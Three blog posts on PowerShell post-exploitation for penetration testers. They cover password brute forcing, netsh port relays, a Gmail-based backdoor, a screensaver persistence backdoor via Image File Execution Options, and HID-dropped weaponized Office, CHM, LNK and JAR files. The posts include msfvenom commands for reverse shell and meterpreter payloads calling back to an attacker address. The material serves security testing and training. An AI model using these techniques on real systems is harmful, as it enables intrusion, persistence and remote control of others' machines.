Friday, April 17, 2015

Pillage the Village - The PowerShell version

I recently saw the slides of the awesome SANS webcast, "Pillage the Village Redux: More Pen Test Adventures in Post Exploitation". Ed Skoudis and John Strand demonstrated some nifty tricks which could come really handy during a penetration test.  Thanks guys! They used batch scripts, PowerShell scripts, netsh utility and tools in Python - Gcat and Murdock.

I noticed couple of points where using PowerShell can make some of the tricks mentioned in the webcast even better! If not better, PowerShell at least provides alternative methods. So I ended up writing some pieces of code and this blog post. This post flows through the slides of the webcast so make sure you have the slides. I assume that I can use the commands from the slides here. So, here we go.

First three commands:

The first three commands mentioned in the webcast are  very useful for enumerating shares users and brute forcing passwords. The interesting thing to note here that passwords even for non-administrative users could be guessed this way.

As in the webcast (without PowerShell):
SMB access is required for above.

With the help of PowerShell, we can do it over LDAP, so chances of having the port filtered are less. Plus, because in PowerShell we deal with Objects, it would be easier to play more with the commands.

For the first two commands, lets use Veil-PowerView by Will.

For brute forcing, lets use Invoke-BruteForce script from Nishang,
It looks like this in action:
Sweet! Exactly what we wanted.

The GPP clear text passwords thing could be executed with PowerShell using Get-GPPPassword from PowerSploit which has been mentioned in the webcast as well.

The netsh Command

There is so much netsh awesomeness in the webcast. Here also, PowerShell provides an easier way to achieve the same (or even better) results.

To use netsh remotely, if netsh> set machine is used, it requires the RPC port 135/TCP. Also, Remote Registry service and Routing and Remote Access service are required which are disabled by default on modern Windows Servers. PowerShell remoting to the rescue! It is enabled by default on Server 2012 and is more firewall friendly than RPC/DCOM. You can use netsh from a PSSession or with Invoke-Commad. 

To make it easier to use, I have created a PowerShell script wrapper for netsh portproxy functionality.
I give you Invoke-NetworkRelay.ps1. It could be found in the Pivot directory of Nishang. It is also available in Powerpreter. Here is how we can use it for v4tov4 relay:
The above command forwards the port 445 on 192.168.1.22 to 192.168.254.141. That is, we can now access port 445 of 192.168.1.22 by connecting to port 8888 on 192.168.254.141.

Personally, I prefer relaying v4 to v6 or v6 to v6 as some organizations tend to ignore IPv6 and it is not monitored. Lets create a relay for a web server:
And this is how it looks like:
We can access the relayed port from a browser. Note the square brackets [] around the IPv6 address.
Great!
Use the -Delete parameter at the end of above command to delete the relay. Use the -Show parameter to list all relays on the specified computer.

Network relays could also be created using powercat, Netcat in PowerShell.

Gcat

Lets move on to using Gmail as backdoor. Let me give you, Invoke-PSGcat and Invoke-PSGcatAgent. Both could be found in the "Shells" directory of Nishang.

Use Invoke-PsGcat on your (the attacker) computer and Invoke-PsGcatAgent on the target. Both require a valid Gmail account with "Access for less secure apps" turned on. It is advisable to use a throw away account.

Use below to send a command 

Use below to receive output
Note that you will see IMAP communication and the output will not be pretty. That is on my TODO list. Thanks to Lee Holmes (@Lee_Holmes) and everyone else who answered my call for help.

Use below to send a script
Note that the agent may show errors while trying to retrieve the encoded script. Let it run and it will eventually pull the script and execute it. 
Lets see the script execution in action.The script reverse_powershell.ps1 is the PowerShell payload from metasploit (msfvenom -p cmd/windows/reverse_powershell) with just the "powershell -w hidden -nop -c" part removed from the first line.

Great! We are able to execute the PowerShell script!
And for those of you who are not satisfied without a meterpreter :) Generate a PowerShell meterpreter with msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<> -f psh, encode it with Invoke-Command from Nishang with -OutCommand parameter and execute it from the session we already have with powershell -e :
Yeaaah! A meterpreter, finally :P

Note that currently, large scripts are not being executed by the agent. I am looking into that as well :)

So, we saw that PowerShell could be used to not only enhance our Penetration Testing results by improving existing techniques but also help by providing alternatives. Its upside being it is already present on all modern Windows computers, it is trusted by sysadmins and countermeasures like Anti Virus, it is easy to learn and provides access to almost everything on a local computer and other Windows machines on the network. 

PowerShell is no more the future of Windows Post Exploitation, it is the present.

If you liked the post and want to learn more and/or want to support my research and work, join me for a two days training "PowerShell for Penetration Testers" at:

NolaCon, New Orleans (June 10-11th) - https://nolacon.com/powershell-for-penetration-testers/
Shakacon, Honolulu (July 6-7th) - http://shakacon.org/

Saturday, February 28, 2015

Using Windows Screensaver as a Backdoor with PowerShell

I came across this interesting post about bypassing Windows Lock Screen via Flash Screensaver. While bypassing the lock screen is useful, the method mentioned there needs physical access to the target. This feature of Windows could be used for much more fun without physical access. The fact that Screensaver would run our payload whenever the target would be idle makes it much useful as a backdoor. 
Lets see!

Using below simple PowerShell command, from an elevated shell, we can run an executable whenever Screensaver timeout occurs, assuming that the Screensaver in use is the built-in Ribbons.scr
And when the timeout occurs we have a command prompt (which may keep running in a loop). Fun, but needs physical access!

To quickly test screensaver execution, I used MonitorES from here.

Using PowerShell, we can do some neat stuff with this. For example, using the below one liner we can download and execute scripts. We can always change the script on the webserver so a new script could be executed everytime the screensaver starts.
Above could be used to execute PowerShell scripts and modules.

Now, to make it less suspicious for a user, we should be able to launch the screensaver alongwith our command/script. Let me give you, Add-ScrnSaveBackdoor.

Add-ScrnSaveBackdoor

It reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE to check for the existing Screensaver. If none exists, one from the default ones which exist in C:\Windows\System32 is used.

A Debugger to the screensaver is created at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\. It is the value of the "Debugger" to this key where it writes the payload. A screensaver selected from the default ones is added to this payload. When the payload is executed, the screensaver also runs after it to make it appear legit.

Below command shows how to use Add-ScrnSaveBackdoor to execute FireBuster from Nishang for Egress Testing. The FireListener must be started on the attacker's machine:

Below command executes HTTP-Backdoor from Powerpreter:

And use the below command to execute an in-memory meterpreter in PowerShell format generated using msfvenom (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell):
Aaaand...

Bingo! With the help of PowerShell, we used this method which required physical access for remote access. It works fine with the "On resume, display logon screen" setting. We can always change contents of the script URL to execute different scripts using the same backdoor.

The source for Add-ScrnSaveBackdoor could be found in Nishang github repo.

Below video shows a walkthrough of the source code and shows Add-ScrnSaveBackdoor in action to pop a reverse_https meterpreter.

Meh!

Administrative  privilege (elevated shell) is required to use Add-ScrnSaveBackdoor.

SCRNSAVE.EXE could be used for evil is known for much longer time. http://www.securityfocus.com/archive/1/434926/30/0/threaded

"Image File execution Options" could be used for evil is also known. So AV *may* catch it.

This setting "can be superceded by the No screen saver Group Policy"



Hope you enjoyed this! Please leave comments and feedback.

If you like this and want to learn more, please checkout my two day training "PowerShell for Hackers" at Troopers 15 on 16th-17th March (https://www.troopers.de/events/troopers15/292_powershell_for_hackers/) or other trainings I am doing at various conferences in the right pane.

Tuesday, January 27, 2015

Dropping infected/weaponized files using a Human Interface Device

This post discusses dropping infected/weaponized files on a target using a Human Interface Device. I am always against using mounted SD cards in a HID. In my experience, it increases the chances of detection and blocking. Using HID without SD card limits the capability of dropping files to much extent. But it is still possible to drop files using HID, a Teensy 3.0, without having to mount additional storage.

Kautilya now has a new category of attacks - "Drop Files". Following payloads have been added.
- Drop a MS Word file
- Drop a Excel file
- Drop a CHM (Compiled HTML Help) file
- Drop a Shortcut (.LNK) file
- Drop a JAR file


Lets have a look at these payloads.

Drop a MS Word file

Use this to drop a MS Word file on a target. The Word file contains an auto executable Macro which executes when the document is opened. PowerShell commands and scripts could be executed. While a command could be simply provided as an option, to execute a script following PowerShell one-liner should be used:
Below screenshot shows a screen for this payload.


The generated sketch needs to be uploaded to a HID. On a target, the HID drops a PowerShell script which generates the infected MS Word file on the Desktop of current user. 

Drop a MS Excel file

This payload is similar to the MS Word payload so no need of looking at it. PowerShell scripts and commands could be passed in the same way to it.

Drop a CHM (Compiled HTML Help) file

This payload drops a weaponized CHM file on a target. Since, compiling CHM files requires HTML Help Workshop, the CHM file is generated on attacker's machine, compressed into a zip archive and byte encoded. This encoded file is written to the HID as a byte array and is then dropped on the target as a zip archive and decompressed. The byte array is quite big even after compression so the time taken by HID to type it on a target is much longer than other payloads. Kautilya shows a warning when this payload is selected.

We have to use Out-CHM in the extras directory of Kautilya to generate the CHM. The script also compresses it and creates a byte encoded text file from it. From a PowerShell prompt use this:
Note that we must have HTML Help Workshop installed on the attacking machine. It could be downloaded from here: http://www.microsoft.com/en-us/download/details.aspx?id=21138

Above command outputs a text file encodedchm.txt. It has to be copied to lib/src directory in Kautilya. The file is read by Kautilya and the sketch (.ino file) is generated to be written to HID.
On a victim, the HID drops the zip, uncompresses it, deletes zip and leaves the CHM on the current user's desktop.

Drop a Shortcut (.LNK) file

This payload drops a shortcut file (.lnk) on a target machine. The shortcut is set to the path powershell.exe which is. by default, same on every machine and the command/script is passed as an argument to it. We can also assign hotkey and icon to the shortcut. Interestingly, assigning a hotkey means every time the user presses that key our weaponized shortcut file would execute ;)

When the HID is connected to a target. A shortcut is created on the current user's desktop. Whenever a user clicks on the shortcut or presses the hotkey the specified command or script would be executed.

Drop a JAR file

Use this payload to drop a JAR file on a target. Like the CHM file attack, the JAR is to be created using Out-Java in the extras directory. This payload also takes much more time than other paylods in Kautilya.
From a PowerShell prompt use this:
Above command outputs a text file encodedjar.txt. It has to be copied to lib/src directory in Kautilya. The file is read by Kautilya and the sketch (.ino file) is generated to be written to HID.
On a victim, the HID drops the JAR on the current user's desktop.

Below video shows the MS Word attack in action. Its my first video so please share your feedback :)


Neat!

So we can drop weaponized files on a target while using only the Keyboard emulation on a programmable HID. A useful addition to an attacker's toolchest. Kautilya could be found here: https://github.com/samratashok/Kautilya

Hope you enjoyed this!

I am doing trainings on "PowerShell for Penetration Testers" during March 2015.  A one day training at CanSecWest on 14th March (details here) and a two day training at Troopers on 16th-17th March 2015 (details here).